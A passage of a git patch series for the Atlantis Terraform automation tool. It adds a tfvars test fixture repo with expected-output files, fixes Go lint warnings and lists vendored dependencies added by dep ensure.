+ workflow: staging + name: staging +workflows: + default: + plan: + steps: + - run: rm -rf .terraform + - init: + extra_args: [-backend-config=default.backend.tfvars] + - plan: + extra_args: [-var-file=default.tfvars] + staging: + plan: + steps: + - run: rm -rf .terraform + - init: + extra_args: [-backend-config=staging.backend.tfvars] + - plan: + extra_args: [-var-file, staging.tfvars] diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars new file mode 100644 index 0000000000..a03acf6e2d --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars @@ -0,0 +1 @@ +path = "default.tfstate" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars new file mode 100644 index 0000000000..c5e157a5d5 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars @@ -0,0 +1 @@ +var = "default" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt new file mode 100644 index 0000000000..9ccb1a95d6 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt @@ -0,0 +1,21 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after *s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +The state of your infrastructure has been saved to the path +below. This state is required to modify and destroy your +infrastructure, so keep it safe. To inspect the complete state +use the `terraform show` command. 
+ +State path: default.tfstate + +Outputs: + +var = default +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act new file mode 100644 index 0000000000..aa4f734726 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act @@ -0,0 +1,7 @@ +Ran Apply in dir: `.` workspace: `default` +**Apply Error** +``` +no plan found at path "." and workspace "default"–did you run plan? +``` + + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt new file mode 100644 index 0000000000..e0d34d0905 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt @@ -0,0 +1,21 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after *s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +The state of your infrastructure has been saved to the path +below. This state is required to modify and destroy your +infrastructure, so keep it safe. To inspect the complete state +use the `terraform show` command. + +State path: staging.tfstate + +Outputs: + +var = staging +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt new file mode 100644 index 0000000000..d51e3ff700 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt @@ -0,0 +1,51 @@ +Ran Plan for 2 projects: +1. workspace: `default` path: `.` +1. workspace: `default` path: `.` + +### 1. workspace: `default` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... 
+The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- +### 2. workspace: `default` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act new file mode 100644 index 0000000000..0da9bc5a5e --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act @@ -0,0 +1,61 @@ +Ran Plan for 2 projects: +1. workspace: `default` path: `.` +1. workspace: `default` path: `.` + +### 1. workspace: `default` path: `.` +**Plan Error** +``` +exit status 1: running "sh -c terraform init -no-color -backend-config=default.backend.tfvars" in "/var/folders/z1/4z__7jv12y7f9yz__nwy55z40000gp/T/201347935/repos/runatlantis/atlantis-tests/1/default": + +Initializing the backend... + +Successfully configured the backend "local"! Terraform will automatically +use this backend unless the backend configuration changes. 
+ +Initializing provider plugins... +- Checking for available provider plugins on https://releases.hashicorp.com... + +Error installing provider "null": Get https://releases.hashicorp.com/terraform-provider-null/: net/http: TLS handshake timeout. + +Terraform analyses the configuration and state and automatically downloads +plugins for the providers used. However, when attempting to download this +plugin an unexpected error occured. + +This may be caused if for some reason Terraform is unable to reach the +plugin repository. The repository may be unreachable if access is blocked +by a firewall. + +If automatic installation is not possible or desirable in your environment, +you may alternatively manually install plugins by downloading a suitable +distribution package and placing the plugin's executable file in the +following directory: + terraform.d/plugins/darwin_amd64 + + +``` + +--- +### 2. workspace: `default` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). 
+--- + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt new file mode 100644 index 0000000000..c09b916bd6 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/main.tf b/server/testfixtures/test-repos/tfvars-yaml/main.tf new file mode 100644 index 0000000000..d4d77ff4e7 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/main.tf @@ -0,0 +1,19 @@ +terraform { + backend "local" { + } +} + +resource "null_resource" "simple" { + count = 1 +} + +variable "var" { +} + +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars new file mode 100644 index 0000000000..e8133a2b59 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars @@ -0,0 +1 @@ +path = "staging.tfstate" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars new file mode 100644 index 0000000000..34f4bbb990 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars @@ -0,0 +1 @@ +var = "staging" \ No newline at end of file From 45d80fc695b445e70aeec2668f244730829016a1 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 19 Jun 2018 20:59:25 +0100 Subject: [PATCH 30/69] Fix gometalint errors. 
--- server/events/atlantis_workspace.go | 4 ++-- server/events/markdown_renderer.go | 1 - server/events/project_finder_test.go | 1 + server/events/project_operator.go | 6 +++--- server/events/runtime/init_step_operator.go | 1 + server/events/yaml/parser_validator_test.go | 8 -------- server/events_controller.go | 6 +++--- testing/temp_files.go | 4 +++- 8 files changed, 13 insertions(+), 18 deletions(-) diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go index 67112b1ce4..06944bdae7 100644 --- a/server/events/atlantis_workspace.go +++ b/server/events/atlantis_workspace.go @@ -70,11 +70,11 @@ func (w *FileWorkspace) Clone( return "", errors.Wrapf(err, "running git rev-parse HEAD: %s", string(output)) } currCommit := strings.Trim(string(output), "\n") - if string(currCommit) == p.HeadCommit { + if currCommit == p.HeadCommit { log.Debug("repo is at correct commit %q so will not re-clone", p.HeadCommit) return cloneDir, nil } - log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, string(currCommit)) + log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, currCommit) // It's okay to delete all plans now since they're out of date. 
log.Info("cleaning clone directory %q", cloneDir) diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index 0f623f04a6..acb0d86791 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -154,6 +154,5 @@ var errWithLogTmpl = template.Must(template.New("").Parse(errTmplText + logTmpl) var failureTmplText = "**{{.Command}} Failed**: {{.Failure}}\n" var failureTmpl = template.Must(template.New("").Parse(failureTmplText)) var failureWithLogTmpl = template.Must(template.New("").Parse(failureTmplText + logTmpl)) -var autoplanNoProjectsTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText)) var autoplanNoProjectsWithLogTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText + logTmpl)) var logTmpl = "{{if .Verbose}}\n
Log\n

\n\n```\n{{.Log}}```\n

{{end}}\n" diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go index 8e787a6eec..82aa84b847 100644 --- a/server/events/project_finder_test.go +++ b/server/events/project_finder_test.go @@ -47,6 +47,7 @@ func setupTmpRepos(t *testing.T) { // main.tf var err error nestedModules1, err = ioutil.TempDir("", "") + Ok(t, err) err = os.MkdirAll(filepath.Join(nestedModules1, "project1/modules"), 0700) Ok(t, err) files := []string{ diff --git a/server/events/project_operator.go b/server/events/project_operator.go index 5e7e7e43e9..b5e8184ec3 100644 --- a/server/events/project_operator.go +++ b/server/events/project_operator.go @@ -68,12 +68,12 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr var projAbsPath string if projAbsPathPtr == nil { ctx.Log.Debug("project has not yet been cloned") - repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) - if err != nil { + repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) + if cloneErr != nil { if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) } - return ProjectResult{Error: err} + return ProjectResult{Error: cloneErr} } projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath) ctx.Log.Debug("project successfully cloned to %q", projAbsPath) diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_operator.go index 307c91bcfe..f483ecbbd9 100644 --- a/server/events/runtime/init_step_operator.go +++ b/server/events/runtime/init_step_operator.go @@ -11,6 +11,7 @@ type InitStepOperator struct { DefaultTFVersion *version.Version } +// nolint: unparam func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { tfVersion := i.DefaultTFVersion if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { diff 
--git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index abafcba940..fe11f82c72 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -616,14 +616,6 @@ workflows: } } -// Bool is a helper routine that allocates a new bool value -// to store v and returns a pointer to it. -func Bool(v bool) *bool { return &v } - -// Int is a helper routine that allocates a new int value -// to store v and returns a pointer to it. -func Int(v int) *int { return &v } - // String is a helper routine that allocates a new string value // to store v and returns a pointer to it. func String(v string) *string { return &v } diff --git a/server/events_controller.go b/server/events_controller.go index e41fe75c23..a132b094c9 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -165,7 +165,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // whitelisted. This is because the user might be expecting Atlantis to // autoplan. For other events, we just ignore them. if eventType == OpenPullEvent { - e.commentNotWhitelisted(w, baseRepo, pull.Num) + e.commentNotWhitelisted(baseRepo, pull.Num) } e.respond(w, logging.Debug, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo") return @@ -255,7 +255,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. 
if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { - e.commentNotWhitelisted(w, baseRepo, pullNum) + e.commentNotWhitelisted(baseRepo, pullNum) e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted") return } @@ -328,7 +328,7 @@ func (e *EventsController) respond(w http.ResponseWriter, lvl logging.LogLevel, // commentNotWhitelisted comments on the pull request that the repo is not // whitelisted. -func (e *EventsController) commentNotWhitelisted(w http.ResponseWriter, baseRepo models.Repo, pullNum int) { +func (e *EventsController) commentNotWhitelisted(baseRepo models.Repo, pullNum int) { errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```" if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil { e.Logger.Err("unable to comment on pull request: %s", err) diff --git a/testing/temp_files.go b/testing/temp_files.go index 85dd68c5b1..1bfd0f15f4 100644 --- a/testing/temp_files.go +++ b/testing/temp_files.go @@ -13,5 +13,7 @@ import ( func TempDir(t *testing.T) (string, func()) { tmpDir, err := ioutil.TempDir("", "") Ok(t, err) - return tmpDir, func() { os.RemoveAll(tmpDir) } + return tmpDir, func() { + os.RemoveAll(tmpDir) // nolint: errcheck + } } From 21694c92307754a6c4bf2662ca688c2ea5005ab2 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 19 Jun 2018 21:10:07 +0100 Subject: [PATCH 31/69] Run dep ensure --- Gopkg.lock | 68 +- .../github.com/Masterminds/semver/.travis.yml | 27 + .../Masterminds/semver/CHANGELOG.md | 86 + .../github.com/Masterminds/semver/LICENSE.txt | 20 + vendor/github.com/Masterminds/semver/Makefile | 36 + .../github.com/Masterminds/semver/README.md | 165 + .../Masterminds/semver/appveyor.yml | 44 + .../Masterminds/semver/benchmark_test.go | 157 + .../Masterminds/semver/collection.go | 24 + .../Masterminds/semver/collection_test.go | 46 + .../Masterminds/semver/constraints.go | 426 + .../Masterminds/semver/constraints_test.go | 465 + 
vendor/github.com/Masterminds/semver/doc.go | 115 + .../github.com/Masterminds/semver/version.go | 421 + .../Masterminds/semver/version_test.go | 490 ++ .../github.com/Masterminds/sprig/.gitignore | 2 + .../github.com/Masterminds/sprig/.travis.yml | 23 + .../github.com/Masterminds/sprig/CHANGELOG.md | 153 + .../github.com/Masterminds/sprig/LICENSE.txt | 20 + vendor/github.com/Masterminds/sprig/Makefile | 13 + vendor/github.com/Masterminds/sprig/README.md | 81 + .../github.com/Masterminds/sprig/appveyor.yml | 26 + vendor/github.com/Masterminds/sprig/crypto.go | 430 + .../Masterminds/sprig/crypto_test.go | 259 + vendor/github.com/Masterminds/sprig/date.go | 76 + .../github.com/Masterminds/sprig/date_test.go | 36 + .../github.com/Masterminds/sprig/defaults.go | 84 + .../Masterminds/sprig/defaults_test.go | 129 + vendor/github.com/Masterminds/sprig/dict.go | 88 + .../github.com/Masterminds/sprig/dict_test.go | 175 + vendor/github.com/Masterminds/sprig/doc.go | 233 + .../Masterminds/sprig/docs/_config.yml | 1 + .../Masterminds/sprig/docs/conversion.md | 25 + .../Masterminds/sprig/docs/crypto.md | 133 + .../github.com/Masterminds/sprig/docs/date.md | 88 + .../Masterminds/sprig/docs/defaults.md | 113 + .../Masterminds/sprig/docs/dicts.md | 131 + .../Masterminds/sprig/docs/encoding.md | 6 + .../Masterminds/sprig/docs/flow_control.md | 11 + .../Masterminds/sprig/docs/index.md | 23 + .../Masterminds/sprig/docs/integer_slice.md | 25 + .../Masterminds/sprig/docs/lists.md | 111 + .../github.com/Masterminds/sprig/docs/math.md | 63 + .../github.com/Masterminds/sprig/docs/os.md | 24 + .../Masterminds/sprig/docs/paths.md | 43 + .../Masterminds/sprig/docs/reflection.md | 38 + .../Masterminds/sprig/docs/semver.md | 124 + .../Masterminds/sprig/docs/string_slice.md | 55 + .../Masterminds/sprig/docs/strings.md | 397 + .../github.com/Masterminds/sprig/docs/uuid.md | 9 + .../Masterminds/sprig/example_test.go | 25 + .../Masterminds/sprig/flow_control_test.go | 16 + 
.../github.com/Masterminds/sprig/functions.go | 281 + .../Masterminds/sprig/functions_test.go | 108 + .../github.com/Masterminds/sprig/glide.lock | 33 + .../github.com/Masterminds/sprig/glide.yaml | 15 + vendor/github.com/Masterminds/sprig/list.go | 259 + .../github.com/Masterminds/sprig/list_test.go | 157 + .../github.com/Masterminds/sprig/numeric.go | 159 + .../Masterminds/sprig/numeric_test.go | 205 + .../github.com/Masterminds/sprig/reflect.go | 28 + .../Masterminds/sprig/reflect_test.go | 73 + vendor/github.com/Masterminds/sprig/regex.go | 35 + .../Masterminds/sprig/regex_test.go | 61 + vendor/github.com/Masterminds/sprig/semver.go | 23 + .../Masterminds/sprig/semver_test.go | 31 + .../github.com/Masterminds/sprig/strings.go | 201 + .../Masterminds/sprig/strings_test.go | 227 + vendor/github.com/Sirupsen/logrus/.gitignore | 1 + vendor/github.com/Sirupsen/logrus/.travis.yml | 15 + .../github.com/Sirupsen/logrus/CHANGELOG.md | 123 + vendor/github.com/Sirupsen/logrus/LICENSE | 21 + vendor/github.com/Sirupsen/logrus/README.md | 511 ++ vendor/github.com/Sirupsen/logrus/alt_exit.go | 64 + .../Sirupsen/logrus/alt_exit_test.go | 83 + .../github.com/Sirupsen/logrus/appveyor.yml | 14 + vendor/github.com/Sirupsen/logrus/doc.go | 26 + vendor/github.com/Sirupsen/logrus/entry.go | 288 + .../github.com/Sirupsen/logrus/entry_test.go | 115 + .../Sirupsen/logrus/example_basic_test.go | 69 + .../Sirupsen/logrus/example_hook_test.go | 35 + vendor/github.com/Sirupsen/logrus/exported.go | 193 + .../github.com/Sirupsen/logrus/formatter.go | 45 + .../Sirupsen/logrus/formatter_bench_test.go | 101 + .../github.com/Sirupsen/logrus/hook_test.go | 144 + vendor/github.com/Sirupsen/logrus/hooks.go | 34 + .../Sirupsen/logrus/hooks/syslog/README.md | 39 + .../Sirupsen/logrus/hooks/syslog/syslog.go | 55 + .../logrus/hooks/syslog/syslog_test.go | 27 + .../Sirupsen/logrus/hooks/test/test.go | 95 + .../Sirupsen/logrus/hooks/test/test_test.go | 61 + .../Sirupsen/logrus/json_formatter.go | 79 + 
.../Sirupsen/logrus/json_formatter_test.go | 199 + vendor/github.com/Sirupsen/logrus/logger.go | 323 + .../Sirupsen/logrus/logger_bench_test.go | 61 + vendor/github.com/Sirupsen/logrus/logrus.go | 143 + .../github.com/Sirupsen/logrus/logrus_test.go | 386 + .../Sirupsen/logrus/terminal_bsd.go | 10 + .../logrus/terminal_check_appengine.go | 11 + .../logrus/terminal_check_notappengine.go | 19 + .../Sirupsen/logrus/terminal_linux.go | 14 + .../Sirupsen/logrus/text_formatter.go | 178 + .../Sirupsen/logrus/text_formatter_test.go | 141 + vendor/github.com/Sirupsen/logrus/writer.go | 62 + vendor/github.com/aokoli/goutils/.travis.yml | 18 + vendor/github.com/aokoli/goutils/CHANGELOG.md | 8 + vendor/github.com/aokoli/goutils/LICENSE.txt | 202 + vendor/github.com/aokoli/goutils/README.md | 70 + vendor/github.com/aokoli/goutils/appveyor.yml | 21 + .../aokoli/goutils/randomstringutils.go | 268 + .../aokoli/goutils/randomstringutils_test.go | 78 + .../github.com/aokoli/goutils/stringutils.go | 224 + .../aokoli/goutils/stringutils_test.go | 309 + vendor/github.com/aokoli/goutils/wordutils.go | 356 + .../aokoli/goutils/wordutils_test.go | 225 + vendor/github.com/davecgh/go-spew/.gitignore | 22 + vendor/github.com/davecgh/go-spew/.travis.yml | 14 + vendor/github.com/davecgh/go-spew/LICENSE | 15 + vendor/github.com/davecgh/go-spew/README.md | 205 + .../github.com/davecgh/go-spew/cov_report.sh | 22 + .../github.com/davecgh/go-spew/spew/bypass.go | 152 + .../davecgh/go-spew/spew/bypasssafe.go | 38 + .../github.com/davecgh/go-spew/spew/common.go | 341 + .../davecgh/go-spew/spew/common_test.go | 298 + .../github.com/davecgh/go-spew/spew/config.go | 306 + vendor/github.com/davecgh/go-spew/spew/doc.go | 211 + .../github.com/davecgh/go-spew/spew/dump.go | 509 ++ .../davecgh/go-spew/spew/dump_test.go | 1042 +++ .../davecgh/go-spew/spew/dumpcgo_test.go | 99 + .../davecgh/go-spew/spew/dumpnocgo_test.go | 26 + .../davecgh/go-spew/spew/example_test.go | 226 + 
.../github.com/davecgh/go-spew/spew/format.go | 419 + .../davecgh/go-spew/spew/format_test.go | 1558 ++++ .../davecgh/go-spew/spew/internal_test.go | 87 + .../go-spew/spew/internalunsafe_test.go | 102 + .../github.com/davecgh/go-spew/spew/spew.go | 148 + .../davecgh/go-spew/spew/spew_test.go | 320 + .../davecgh/go-spew/spew/testdata/dumpcgo.go | 82 + .../davecgh/go-spew/test_coverage.txt | 61 + vendor/github.com/docker/docker/.dockerignore | 4 + .../docker/docker/.github/ISSUE_TEMPLATE.md | 64 + .../docker/.github/PULL_REQUEST_TEMPLATE.md | 30 + vendor/github.com/docker/docker/.gitignore | 33 + vendor/github.com/docker/docker/.mailmap | 275 + vendor/github.com/docker/docker/AUTHORS | 1652 ++++ vendor/github.com/docker/docker/CHANGELOG.md | 3337 +++++++ .../github.com/docker/docker/CONTRIBUTING.md | 401 + vendor/github.com/docker/docker/Dockerfile | 246 + .../docker/docker/Dockerfile.aarch64 | 175 + .../github.com/docker/docker/Dockerfile.armhf | 182 + .../docker/docker/Dockerfile.ppc64le | 188 + .../github.com/docker/docker/Dockerfile.s390x | 190 + .../docker/docker/Dockerfile.simple | 73 + .../docker/docker/Dockerfile.solaris | 20 + .../docker/docker/Dockerfile.windows | 267 + vendor/github.com/docker/docker/LICENSE | 191 + vendor/github.com/docker/docker/MAINTAINERS | 376 + vendor/github.com/docker/docker/Makefile | 147 + vendor/github.com/docker/docker/NOTICE | 19 + vendor/github.com/docker/docker/README.md | 304 + vendor/github.com/docker/docker/ROADMAP.md | 118 + vendor/github.com/docker/docker/VENDORING.md | 45 + vendor/github.com/docker/docker/VERSION | 1 + vendor/github.com/docker/docker/api/README.md | 42 + vendor/github.com/docker/docker/api/common.go | 166 + .../docker/docker/api/common_test.go | 341 + .../docker/docker/api/common_unix.go | 6 + .../docker/docker/api/common_windows.go | 8 + .../docker/docker/api/errors/errors.go | 47 + .../docker/docker/api/fixtures/keyfile | 7 + .../docker/api/server/httputils/decoder.go | 16 + 
.../docker/api/server/httputils/errors.go | 101 + .../docker/api/server/httputils/form.go | 73 + .../docker/api/server/httputils/form_test.go | 105 + .../docker/api/server/httputils/httputils.go | 90 + .../server/httputils/httputils_write_json.go | 17 + .../httputils/httputils_write_json_go16.go | 16 + .../docker/docker/api/server/middleware.go | 24 + .../docker/api/server/middleware/cors.go | 37 + .../docker/api/server/middleware/debug.go | 76 + .../api/server/middleware/experimental.go | 29 + .../api/server/middleware/middleware.go | 13 + .../docker/api/server/middleware/version.go | 50 + .../api/server/middleware/version_test.go | 57 + .../docker/docker/api/server/profiler.go | 41 + .../docker/api/server/router/build/backend.go | 20 + .../docker/api/server/router/build/build.go | 29 + .../api/server/router/build/build_routes.go | 225 + .../api/server/router/checkpoint/backend.go | 10 + .../server/router/checkpoint/checkpoint.go | 36 + .../router/checkpoint/checkpoint_routes.go | 65 + .../api/server/router/container/backend.go | 79 + .../api/server/router/container/container.go | 77 + .../router/container/container_routes.go | 554 ++ .../api/server/router/container/copy.go | 119 + .../api/server/router/container/exec.go | 140 + .../api/server/router/container/inspect.go | 21 + .../docker/api/server/router/experimental.go | 67 + .../docker/api/server/router/image/backend.go | 45 + .../docker/api/server/router/image/image.go | 50 + .../api/server/router/image/image_routes.go | 344 + .../docker/docker/api/server/router/local.go | 96 + .../api/server/router/network/backend.go | 22 + .../api/server/router/network/filter.go | 96 + .../api/server/router/network/network.go | 44 + .../server/router/network/network_routes.go | 308 + .../api/server/router/plugin/backend.go | 25 + .../docker/api/server/router/plugin/plugin.go | 39 + .../api/server/router/plugin/plugin_routes.go | 314 + .../docker/docker/api/server/router/router.go | 19 + 
.../docker/api/server/router/swarm/backend.go | 36 + .../docker/api/server/router/swarm/cluster.go | 52 + .../api/server/router/swarm/cluster_routes.go | 418 + .../api/server/router/system/backend.go | 21 + .../docker/api/server/router/system/system.go | 39 + .../api/server/router/system/system_routes.go | 186 + .../api/server/router/volume/backend.go | 17 + .../docker/api/server/router/volume/volume.go | 36 + .../api/server/router/volume/volume_routes.go | 80 + .../docker/api/server/router_swapper.go | 30 + .../docker/docker/api/server/server.go | 210 + .../docker/docker/api/server/server_test.go | 46 + .../docker/docker/api/swagger-gen.yaml | 12 + .../github.com/docker/docker/api/swagger.yaml | 7785 +++++++++++++++++ .../api/templates/server/operation.gotmpl | 26 + .../docker/docker/api/types/auth.go | 22 + .../docker/api/types/backend/backend.go | 84 + .../docker/docker/api/types/blkiodev/blkio.go | 23 + .../docker/docker/api/types/client.go | 378 + .../docker/docker/api/types/configs.go | 69 + .../docker/api/types/container/config.go | 62 + .../api/types/container/container_create.go | 21 + .../api/types/container/container_update.go | 17 + .../api/types/container/container_wait.go | 17 + .../docker/api/types/container/host_config.go | 333 + .../api/types/container/hostconfig_unix.go | 81 + .../api/types/container/hostconfig_windows.go | 87 + .../docker/docker/api/types/error_response.go | 13 + .../docker/docker/api/types/events/events.go | 42 + .../docker/docker/api/types/filters/parse.go | 310 + .../docker/api/types/filters/parse_test.go | 417 + .../docker/docker/api/types/id_response.go | 13 + .../docker/docker/api/types/image_summary.go | 49 + .../docker/docker/api/types/mount/mount.go | 113 + .../docker/api/types/network/network.go | 59 + .../docker/docker/api/types/plugin.go | 189 + .../docker/docker/api/types/plugin_device.go | 25 + .../docker/docker/api/types/plugin_env.go | 25 + .../docker/api/types/plugin_interface_type.go | 21 + 
.../docker/docker/api/types/plugin_mount.go | 37 + .../docker/api/types/plugin_responses.go | 64 + .../docker/docker/api/types/port.go | 23 + .../api/types/reference/image_reference.go | 34 + .../types/reference/image_reference_test.go | 72 + .../docker/api/types/registry/authenticate.go | 21 + .../docker/api/types/registry/registry.go | 104 + .../docker/docker/api/types/seccomp.go | 93 + .../api/types/service_update_response.go | 12 + .../docker/docker/api/types/stats.go | 178 + .../docker/api/types/strslice/strslice.go | 30 + .../api/types/strslice/strslice_test.go | 86 + .../docker/docker/api/types/swarm/common.go | 27 + .../docker/api/types/swarm/container.go | 46 + .../docker/docker/api/types/swarm/network.go | 111 + .../docker/docker/api/types/swarm/node.go | 114 + .../docker/docker/api/types/swarm/secret.go | 31 + .../docker/docker/api/types/swarm/service.go | 105 + .../docker/docker/api/types/swarm/swarm.go | 197 + .../docker/docker/api/types/swarm/task.go | 128 + .../docker/api/types/time/duration_convert.go | 12 + .../api/types/time/duration_convert_test.go | 26 + .../docker/docker/api/types/time/timestamp.go | 124 + .../docker/api/types/time/timestamp_test.go | 93 + .../docker/docker/api/types/types.go | 549 ++ .../docker/api/types/versions/README.md | 14 + .../docker/api/types/versions/compare.go | 62 + .../docker/api/types/versions/compare_test.go | 26 + .../docker/api/types/versions/v1p19/types.go | 35 + .../docker/api/types/versions/v1p20/types.go | 40 + .../docker/docker/api/types/volume.go | 58 + .../docker/api/types/volume/volumes_create.go | 29 + .../docker/api/types/volume/volumes_list.go | 23 + .../docker/docker/builder/builder.go | 169 + .../docker/docker/builder/context.go | 260 + .../docker/docker/builder/context_test.go | 307 + .../docker/docker/builder/context_unix.go | 11 + .../docker/docker/builder/context_windows.go | 17 + .../docker/docker/builder/dockerfile/bflag.go | 176 + .../docker/builder/dockerfile/bflag_test.go | 187 + 
.../docker/builder/dockerfile/builder.go | 370 + .../docker/builder/dockerfile/builder_unix.go | 5 + .../builder/dockerfile/builder_windows.go | 3 + .../builder/dockerfile/command/command.go | 46 + .../docker/builder/dockerfile/dispatchers.go | 821 ++ .../builder/dockerfile/dispatchers_test.go | 517 ++ .../builder/dockerfile/dispatchers_unix.go | 27 + .../dockerfile/dispatchers_unix_test.go | 33 + .../builder/dockerfile/dispatchers_windows.go | 86 + .../dockerfile/dispatchers_windows_test.go | 40 + .../docker/builder/dockerfile/envVarTest | 116 + .../docker/builder/dockerfile/evaluator.go | 244 + .../builder/dockerfile/evaluator_test.go | 197 + .../builder/dockerfile/evaluator_unix.go | 9 + .../builder/dockerfile/evaluator_windows.go | 13 + .../docker/builder/dockerfile/internals.go | 669 ++ .../builder/dockerfile/internals_test.go | 95 + .../builder/dockerfile/internals_unix.go | 38 + .../builder/dockerfile/internals_windows.go | 66 + .../dockerfile/internals_windows_test.go | 51 + .../builder/dockerfile/parser/dumper/main.go | 36 + .../builder/dockerfile/parser/json_test.go | 61 + .../builder/dockerfile/parser/line_parsers.go | 361 + .../builder/dockerfile/parser/parser.go | 221 + .../builder/dockerfile/parser/parser_test.go | 173 + .../parser/testfile-line/Dockerfile | 35 + .../env_no_value/Dockerfile | 3 + .../shykes-nested-json/Dockerfile | 1 + .../testfiles/ADD-COPY-with-JSON/Dockerfile | 11 + .../testfiles/ADD-COPY-with-JSON/result | 10 + 